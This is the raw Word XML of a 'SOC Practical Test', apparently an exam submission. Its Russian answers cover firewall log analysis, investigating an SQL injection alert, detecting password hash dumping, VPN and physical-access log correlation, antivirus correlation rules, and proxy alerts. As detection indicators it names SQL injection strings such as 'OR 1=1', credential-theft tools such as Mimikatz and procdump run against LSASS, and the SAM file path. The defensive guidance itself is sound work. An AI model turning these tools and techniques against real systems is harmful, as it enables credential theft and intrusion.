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Oswald" w:hAnsi="Oswald" w:cs="Oswald" w:eastAsia="Oswald"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="56"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Oswald" w:eastAsia="Oswald"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="56"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC Practical Test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Apple Braille" w:hAnsi="Apple Braille" w:cs="Apple Braille" w:eastAsia="Apple Braille"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="52"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:spacing w:before="320" w:after="80" w:line="276"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Apple Braille" w:hAnsi="Apple Braille" w:cs="Apple Braille" w:eastAsia="Apple Braille"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="52"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Apple Braille" w:hAnsi="Apple Braille" w:cs="Apple Braille" w:eastAsia="Apple Braille"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="52"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> ivakhnenka vitali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:spacing w:before="320" w:after="80" w:line="276"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova"/>
          <w:b/>
          <w:color w:val="3C78D8"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova"/>
          <w:b/>
          <w:color w:val="3C78D8"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Questions &amp; Answers :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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security log from Firewall between DMZ and the Internet. How will you use this log for threat detection?</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 безопасности брандмауэра между DMZ и Интернетом является важным инструментом для обнаружения угроз. Вот как его можно использовать:</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аномалий в трафике:</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Сравните текущее поведение трафика с историческими данными, чтобы обнаружить необычные активности, такие как резкое увеличение или снижение объема трафика, частые попытки подключения с неизвестных или подозрительных IP-адресов.</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попыток несанкционированного доступа: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подозрительных попыток доступа, таких как многократные неудачные попытки входа, необычные порты или протоколы, которые обычно не используются в вашей инфраструктуре.</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географических данных:</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географического происхождения входящего трафика. Если обнаружены попытки доступа из стран, которые не связаны с вашей деятельностью, это может быть признаком угрозы.</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известных индикаторов компрометации (IoC):</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Сопоставление IP-адресов, доменов и других данных из журнала с известными индикаторами компрометации, чтобы выявить возможные угрозы.</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временных закономерностей:</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Изучение времени активности в журнале. Внезапная активность в нерабочие часы может свидетельствовать о попытках компрометации.</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направленного трафика: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направленного трафика, чтобы выявить нежелательные или подозрительные соединения, такие как попытки установить связь с сервером управления и контроля (C2).</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автоматизированных инструментов для анализа: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SIEM-систем или других инструментов анализа журнала для автоматического выявления угроз и аномалий, которые сложно обнаружить вручную.</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Корреляция событий с другими журналами:</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Сопоставление данных журнала брандмауэра с другими журналами (например, журналами приложений, системными журналами) для выявления сложных атак, таких как APT (Advanced Persistent Threat).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276"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Эти методы помогут выявить потенциальные угрозы и принять соответствующие меры для защиты сети.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="12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_____________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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SOC analyst and you have got an alert from IDS system about SQL-injection on web server. What will you do? How will you investigate (technical aspects)?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 случае получения предупреждения от IDS (Intrusion Detection System) о возможной атаке SQL-внедрения на веб-сервере, необходимо провести расследование, чтобы подтвердить или опровергнуть угрозу и предпринять соответствующие действия. Вот пошаговый план действий и технические аспекты расследования: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Первоначальная оценка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Подтверждение предупреждения: Оцените, действительно ли предупреждение связано с SQL-внедрением. Это может быть ложное срабатывание, поэтому важно тщательно проанализировать, какие конкретные запросы вызвали тревогу.</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Сбор информации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веб-сервера: Извлеките и проанализируйте журналы веб-сервера (например, Apache, Nginx). Ищите подозрительные запросы, содержащие SQL-код, такие как SELECT, UNION, DROP, OR 1=1, или любые другие инъекции в параметрах URL или формах.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базы данных: Проверьте журналы запросов базы данных для обнаружения аномальных или подозрительных запросов, которые могли быть выполнены в результате SQL-инъекции.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IDS/IPS: Изучите предупреждения, сгенерированные IDS/IPS. Обратите внимание на сигнатуры, которые сработали, и на параметры, вызвавшие срабатывание.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Трафик сети: Если доступен, проанализируйте сетевой трафик (pcap-файлы), чтобы увидеть весь контекст подозрительного запроса.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Анализ уязвимости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Идентификация уязвимых точек: Проверьте, какие страницы веб-сайта или API могут быть подвержены SQL-внедрению. Это может включать параметры URL, поля ввода форм, куки и другие точки взаимодействия.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ввода данных: Определите, применяются ли меры по фильтрации и очистке входных данных на сервере. Если нет, то это потенциальная уязвимость.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Оценка последствий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Определение успешности атаки: Проверьте, был ли выполнен вредоносный SQL-запрос и, если да, какие данные были затронуты или извлечены. Это можно сделать, сопоставив время срабатывания IDS с активностью в базе данных.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на бэкдоры: Убедитесь, что атака не была успешной в установлении бэкдора или другой формы постоянного доступа.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Смягчение последствий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Ограничение доступа: Если атака была успешной, немедленно ограничьте доступ к уязвимым ресурсам, блокируйте IP-адреса злоумышленников или применяйте другие меры по смягчению.</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Обновление сигнатур: Если сигнатура IDS устарела или неэффективна, рассмотрите возможность обновления или создания пользовательских правил для предотвращения подобных атак в будущем.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Патчинг и исправление уязвимости: Внедрите исправления в уязвимое приложение. Это может включать исправление кода, обновление базы данных или изменение конфигурации.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Документация и отчетность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Документирование инцидента: Запишите все шаги расследования, включая временные метки, задействованные системы, уязвимые компоненты и принятые меры.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Отчет для руководства: Подготовьте отчет, описывающий инцидент, его влияние и предложенные меры по предотвращению подобных инцидентов в будущем.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Дальнейший мониторинг и анализ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Наблюдение за системой: Установите дополнительные средства мониторинга или увеличьте частоту проверки логов на наличие подозрительной активности.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Проактивное тестирование: Проведите тесты на проникновение (Penetration Testing) или сканирование уязвимостей, чтобы убедиться, что аналогичные уязвимости устранены.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Уведомление и координация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Уведомление заинтересованных сторон: Сообщите о произошедшем инциденте соответствующим заинтересованным сторонам, таким как разработчики, администраторы баз данных или руководство.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Координация действий: Если необходимо, привлечите к расследованию сторонние организации или экспертов, особенно если инцидент требует глубокого технического анализа или юридического вмешательства.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Этот процесс поможет не только устранить текущую угрозу, но и улучшить общую безопасность системы на будущее.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_____________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276"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most frequent Windows compromise scenarios relate to password hash dump tools usage. Propose detection scenarios (the more the better) of hash dump tools usage. How further illegal usage of stolen credentials can be detected?</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Для обнаружения использования инструментов хэширования паролей и дальнейшего незаконного использования украденных учетных данных в Windows-среде можно применять несколько сценариев. Ниже представлены методы и сценарии, которые помогут выявить такие активности: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Мониторинг использования подозрительных инструментов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Отслеживание запуска известных инструментов: Мониторинг событий запуска популярных инструментов для хэширования и извлечения паролей, таких как Mimikatz, LSA Secrets Dumper, Hashcat, John the Ripper и др. Например, можно отслеживать события с кодом 4688 (создание нового процесса) и искать в них упоминания этих инструментов.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командной строки: Проверка аргументов командной строки на наличие подозрительных параметров, например, запросов к LSASS или вызова API для работы с хэшами паролей.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Анализ доступа к критическим системным файлам и процессам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LSASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">процесс: LSASS (Local Security Authority Subsystem Service) часто является целью атак для извлечения паролей. Отслеживание попыток чтения памяти процесса LSASS может указать на попытки использования инструментов хэширования. Например, попытка создания дампа памяти LSASS или использование таких инструментов, как procdump.</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SAM (Security Account Manager) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">файлы: Мониторинг доступа или копирования файлов SAM, которые хранят хэши паролей учетных записей пользователей, например, по пути C:\Windows\System32\config\SAM.</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Анализ сетевого трафика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подозрительных запросов аутентификации: После получения хэшей злоумышленники могут попытаться использовать их для аутентификации в сети, используя технику Pass-the-Hash. Важно отслеживать множественные попытки входа с одного IP-адреса или от одного пользователя на разные системы.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Аномалии в аутентификации: Анализ событий с кодами 4624 (успешный вход в систему) и 4625 (неудачный вход) на предмет необычной активности, например, одновременного входа в систему с нескольких устройств или входа в систему с ранее неиспользуемого IP-адреса.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Мониторинг работы с учетными записями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Необычная активность учетных записей: Проверка событий с кодом 4672 (специальные привилегии присвоены новому входу в систему), которые могут указывать на повышенные привилегии пользователя, что может быть связано с использованием украденных учетных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учетных данных: Мониторинг событий изменения учетных записей, таких как 4723 (изменение пароля учетной записи пользователя), 4738 (изменение атрибутов учетной записи), и 4720 (создание новой учетной записи), которые могут указывать на злоумышленника, пытающегося укрепить свой доступ.</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Поведенческий анализ</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необычных команд PowerShell: В последнее время злоумышленники часто используют PowerShell для запуска атак и получения данных о хэшах паролей. Анализ выполняемых команд в PowerShell и их частоты может выявить подозрительную активность.</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выполнения скриптов: Определение запуска скриптов, которые могут быть использованы для получения хэшей паролей или последующего использования украденных учетных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Анализ аномалий в поведении пользователей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Повышение привилегий: Мониторинг попыток повышения привилегий учетной записи, который может свидетельствовать о незаконном использовании украденных учетных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часы активности: Обнаружение активности пользователя в нерабочие часы или в часы, когда он обычно не активен.</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Одновременная активность на нескольких системах: Отслеживание входов в систему с одного и того же учетного имени на разных устройствах или в разных географических локациях, что может указывать на использование украденных учетных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Мониторинг изменений в системных конфигурациях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политик безопасности: Проверка событий, связанных с изменением групповых политик или системных настроек, которые могут быть использованы для облегчения дальнейших атак, таких как отключение антивирусов или изменений в политике паролей.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разрешений и прав доступа: Анализ событий изменения разрешений файлов и папок, что может быть связано с подготовкой к атаке или закреплением позиций злоумышленника.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Использование SIEM для корреляции событий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Корреляция событий: Настройка правил корреляции в SIEM для связывания различных событий, таких как доступ к критическим файлам, запуск подозрительных процессов, аутентификация и аномалии в поведении учетных записей.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исторических данных: Использование исторических данных для анализа и поиска подозрительных шаблонов, которые могут указывать на предшествующую активность злоумышленника.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Эти сценарии помогут обеспечить более полное покрытие различных аспектов безопасности в Windows-среде и своевременно выявить потенциальные угрозы, связанные с хэшированием паролей и использованием украденных учетных данных.</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___________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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work in a company that has two offices (Moscow and Perm) and you have logs from VPN gateway, FW, physical Access Control System. Suggest scenarios for detection possibly threats.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Анализ VPN-логов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подключения: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подключения с необычных IP-адресов или географических локаций. Например, попытки подключения к VPN из стран или регионов, где нет сотрудников.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попыток подключения вне рабочего времени или в нехарактерное время.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Множественные неудачные попытки входа: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Определение IP-адресов, с которых было много неудачных попыток входа. Это может указывать на попытки брутфорса.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объемы трафика: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объемов передаваемых данных через VPN. Внезапные увеличения объемов данных могут указывать на потенциальные утечки данных.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Подозрительные аккаунты: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активности учетных записей, которые часто не используются или имеют привилегии, превышающие обычные.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Анализ логов фаервола (FW)</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Необычный сетевой трафик:</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аномалий в исходящем или входящем трафике, таких как неожиданные соединения с внешними IP-адресами или нестандартные порты.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запросы к сервисам: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попыток подключения к внутренним сервисам из внешних источников или попыток доступа к нетипичным внутренним ресурсам.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правил фаервола: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событий изменения конфигурации фаервола для обнаружения возможных несанкционированных изменений в правилах доступа.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Анализ логов системы контроля физического доступа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входы и выходы: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записей о входах и выходах из офиса в нерабочие часы или в период, когда сотрудники обычно не присутствуют.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уровни доступа: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записей о доступе в зоны с ограниченным доступом, к которым имеют доступ только определенные сотрудники.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Необычные местоположения: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попыток входа в офис из разных мест или в разные время, что может указывать на попытки подмены личностей или несанкционированное использование пропусков.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Корреляция данных между системами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Связывание активности VPN и физических доступов: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Сопоставление времени входа в VPN с физическими входами в офисы. Например, если сотрудник подключается к VPN, а затем зарегистрирован в офисе в нерабочее время, это может быть признаком использования украденных учетных данных.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Связывание сетевой активности и физических входов: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были ли попытки доступа к критическим внутренним системам в тех же временных рамках, когда происходят необычные физические входы в офис.</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Анализ пользовательского поведения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Аномалии в доступе к системам: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Определение изменений в паттерне доступа пользователей. Например, если сотрудник начинает получать доступ к ресурсам, которые обычно не являются частью его обязанностей.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Аномалии в использовании привилегий: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использования административных прав или доступа к критическим системам. Аномальная активность может указывать на использование украденных учетных данных.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Проактивный мониторинг и проверка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Регулярные проверки и аудит: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Проведение регулярных проверок и аудитов систем для выявления потенциальных уязвимостей или нарушений.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Обновление и тестирование мер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Обновление систем безопасности и проведение тестов на проникновение для проверки эффективности существующих мер защиты.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Эти сценарии помогут комплексно подходить к выявлению и предотвращению угроз в вашей компании, обеспечивая как проактивное, так и реактивное обнаружение потенциальных инцидентов безопасности.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_______________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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antivirus logs, what correlation rules (detection scenarios) can you suggest?</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Используя журналы антивируса, вы можете создавать различные правила корреляции и сценарии обнаружения для выявления потенциальных угроз и подозрительных действий. Ниже приведены некоторые сценарии и правила, которые могут помочь улучшить обнаружение угроз:</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Повторное обнаружение вредоносного ПО на одной и той же конечной точке</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активировать оповещение, если один и тот же тип вредоносного ПО обнаружен несколько раз на одной и той же конечной точке в течение короткого периода времени (например, 24 часа).</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означать, что вредоносное ПО не было полностью удалено или что система повторно заражается из-за какой-то скрытой проблемы, например, постоянной угрозы или неправильно настроенной системы.</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Обнаружение вредоносного ПО на нескольких конечных точках</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оповещение при обнаружении одного и того же вредоносного ПО на нескольких конечных точках в течение короткого периода времени (например, 1 час).</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указывать на распространение червя или другой формы вредоносного ПО по всей сети, что требует немедленных мер по сдерживанию.</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Обнаружение с последующим изменением системных файлов</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сопоставляйте обнаружение вредоносного ПО с последующими изменениями критических системных файлов или ключей реестра.</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Если изменения обнаружены вскоре после обнаружения вредоносного ПО, это может означать, что вредоносному ПО удалось изменить системные настройки или установить дополнительные компоненты.</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Обнаружение вредоносного ПО с последующей активностью учетной записи пользователя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оповещать о подозрительной активности учетной записи пользователя (например, повышение привилегий, многократные попытки входа в систему, необычное время входа в систему) вскоре после обнаружения вредоносного ПО на той же конечной точке.</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указывать на то, что вредоносное ПО взломало учетную запись пользователя и используется для горизонтального перемещения внутри сети.</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Неудачные попытки удаления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генерировать оповещение, если антивирусу неоднократно не удается удалить или поместить в карантин обнаруженное вредоносное ПО.</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Постоянная неспособность удалить вредоносное ПО может указывать на наличие устойчивой или сложной угрозы, такой как руткит или вредоносное ПО без файлов, требующее дальнейшего расследования.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Обнаружение известных индикаторов повышенной постоянной угрозы (APT)</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Соотнесите обнаружение определенных сигнатур вредоносных программ, известных как связанные с APT, с другими событиями безопасности, такими как необычный сетевой трафик или попытки несанкционированного доступа.</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APT-атаки часто используют сложное вредоносное ПО, которое может остаться незамеченным, если не будет связано с другими подозрительными действиями.</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Обнаружение в привилегированных системах</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Отдавайте приоритет оповещениям, если вредоносное ПО обнаружено на критически важных системах, таких как контроллеры домена, финансовые серверы или рабочие станции руководителей.</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Взлом этих систем может иметь более серьезные последствия, и любое обнаружение в них должно расследоваться в первоочередном порядке.</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Сопоставление с данными внешней разведки об угрозах</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сопоставьте обнаруженные сигнатуры вредоносных программ или IP-адреса из журналов антивируса с внешними источниками информации об угрозах.</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помочь быстрее выявлять известные угрозы и принимать соответствующие меры на основе уровня угрозы, связанного с этими индикаторами.</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9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Обнаружение вредоносного ПО сопровождается высокой сетевой активностью</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оповещать, если после обнаружения вредоносного ПО с конечной точки наблюдается всплеск исходящего сетевого трафика.</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указывать на то, что вредоносная программа извлекает данные или взаимодействует с сервером управления и контроля (C2).</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10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Неожиданное вредоносное ПО в непользовательских папках</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активировать оповещения при обнаружении вредоносного ПО в системных папках или каталогах, где не должно быть пользовательских файлов.</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Вредоносное ПО, обнаруженное в таких местах, часто указывает на более сложную атаку, которая обошла меры безопасности на уровне пользователя.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11. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Одновременное обнаружение и отключение средств безопасности</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Соотносите обнаружение вредоносного ПО с одновременными журналами, указывающими на отключение или вмешательство в работу средств безопасности (например, антивируса, брандмауэра или решений EDR).</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Вредоносное ПО, пытающееся отключить инструменты безопасности, предполагает более серьезную угрозу, которая может попытаться избежать обнаружения или устранения.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12. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Сопоставление с журналами физической безопасности</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если на конечной точке обнаружено вредоносное ПО, сопоставьте его с журналами физического доступа, чтобы определить, имел ли место несанкционированный физический доступ в момент заражения.</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Физический доступ к системам может указывать на внутреннюю угрозу или на то, что вредоносное ПО было внедрено через съемный носитель.</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13. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Обнаружение вредоносного ПО с последующим необычным удалением журнала</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Правило : активировать оповещение, если после обнаружения вредоносного ПО есть доказательства удаления или несанкционированного доступа к журналу безопасности на той же конечной точке.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:hanging="36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Обоснование : Это может указывать на то, что злоумышленник пытается замести следы после взлома системы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Эти правила корреляции могут повысить эффективность вашей антивирусной системы за счет обнаружения более сложных и изощренных угроз, которые могут быть не сразу очевидны при анализе одного события безопасности.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                ____________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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You’ve received alert from the corporate proxy that one workstation has connected to the “Malicious site”:</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Когда вы получаете оповещение от корпоративного прокси-сервера о том, что рабочая станция подключилась к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вредоносному сайту</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крайне важно немедленно принять меры для оценки потенциальной угрозы и минимизации любых рисков. Ниже приведено пошаговое руководство по расследованию т</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Первоначальная оценка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рабочую станцию : определите, какая рабочая станция вызвала оповещение. Запишите ее IP-адрес, имя хоста и пользователя, вошедшего в систему в тот момент.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вредоносный сайт : соберите информацию о вредоносном сайте, включая URL-адрес, доменное имя и любые связанные IP-адреса.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Проверьте журналы прокси-сервера и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прокси-сервера : просмотрите журналы прокси-сервера, чтобы собрать больше сведений о соединении, например точное время доступа, путь URL и любые другие связанные веб-запросы.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брандмауэра : проверьте журналы брандмауэра на наличие входящего или исходящего трафика на IP-адрес вредоносного сайта или с него.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DNS : если они доступны, просмотрите журналы запросов DNS, чтобы подтвердить, разрешила ли рабочая станция доменное имя, связанное с вредоносным сайтом.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Исследование конечной точки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антивируса/EDR : Проверьте журналы антивируса или Endpoint Detection and Response (EDR) на рабочей станции на наличие оповещений или обнаружений, связанных с подключением. Это может включать загрузки вредоносных программ, подозрительную активность или процессы, инициированные после подключения.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Проверить загрузки : Найдите любые файлы, которые могли быть загружены с вредоносного сайта. Если они найдены, изолируйте эти файлы и отправьте их на анализ.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Запущенные процессы : просмотрите запущенные процессы на рабочей станции, чтобы выявить любую подозрительную активность или процессы, которые могли быть порождены соединением.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Изолируйте рабочую станцию ​​(при необходимости)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Изоляция сети : если есть признаки того, что рабочая станция была скомпрометирована, рассмотрите возможность ее изоляции от сети, чтобы предотвратить дальнейший ущерб или боковое перемещение.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Уведомление пользователя : сообщите пользователю о потенциальном инциденте безопасности и порекомендуйте ему воздержаться от использования рабочей станции до дальнейшего уведомления.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Анализ информации об угрозах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вредоносного сайта : используйте каналы разведки угроз или среды песочницы, чтобы собрать больше информации о вредоносном сайте. Определите, связан ли он с известными фишинговыми кампаниями, распространением вредоносного ПО или командно-контрольными (C2) серверами.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IOC (индикаторов компрометации) : определите все известные IOC, связанные с сайтом (например, хэши файлов, IP-адреса, домены), и найдите их в своей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Сопоставьте с другими событиями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Перекрестная проверка с помощью SIEM : если у вас есть система управления информацией и событиями безопасности (SIEM), сопоставьте оповещение прокси-сервера с другими событиями безопасности (например, необычными попытками входа в систему, повышением привилегий), чтобы оценить, является ли это частью более крупной атаки.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активности пользователей : просмотрите активность пользователей, чтобы узнать, не было ли другого подозрительного поведения, например, попыток посетить другие подозрительные сайты, попыток несанкционированного доступа или передачи файлов.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Определите степень компрометации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Оцените утечку данных : проверьте, были ли переданы какие-либо конфиденциальные данные на вредоносный сайт. Это может включать в себя просмотр потоков данных или проверку определенных исходящих шаблонов трафика.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сетевого трафика : поиск других подключений к вредоносному сайту или похожим сайтам с той же или других рабочих станций.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Сдерживание и ликвидация последствий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Заблокируйте вредоносный сайт : убедитесь, что вредоносный сайт заблокирован на уровнях прокси-сервера, брандмауэра и DNS, чтобы предотвратить дальнейший доступ.</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Очистите рабочую станцию : если обнаружены вредоносные программы или другие вредоносные артефакты, удалите их с помощью антивирусных/EDR-инструментов. При необходимости пересоздайте образ рабочей станции.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Сброс пароля : если есть какие-либо признаки того, что учетные данные могли быть скомпрометированы, выполните сброс пароля для затронутых пользователей.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9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Отчетность и документация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Документируйте инцидент : записывайте все выводы, предпринятые действия и хронологию событий. Эта документация будет полезна для анализа и отчетности после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Уведомление заинтересованных сторон : проинформируйте соответствующие заинтересованные стороны, такие как ИТ-отдел, службы безопасности и руководство, об инциденте и мерах, принятых для его разрешения.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10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Обзор после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Обзор средств контроля безопасности : оцените эффективность текущих средств контроля безопасности и при необходимости внесите улучшения (например, обновив правила фильтрации прокси-серверов, улучшив возможности обнаружения угроз).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Обучение пользователей : если инцидент был вызван поведением пользователя (например, переходом по фишинговой ссылке), рассмотрите возможность проведения дополнительного обучения по вопросам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11. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Непрерывный мониторинг</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Контролируйте рабочую станцию : следите за рабочей станцией и пользователем на предмет любых дальнейших подозрительных действий в течение нескольких дней после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сети : продолжайте следить за своей сетью на предмет любых других признаков вредоносной активности, которые могут быть связаны с первоначальным предупреждением.</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Выполнив эти шаги, вы сможете эффективно исследовать и минимизировать потенциальную угрозу, которую представляет подключение к вредоносному сайту, снижая риск дальнейшей компрометации.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____________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
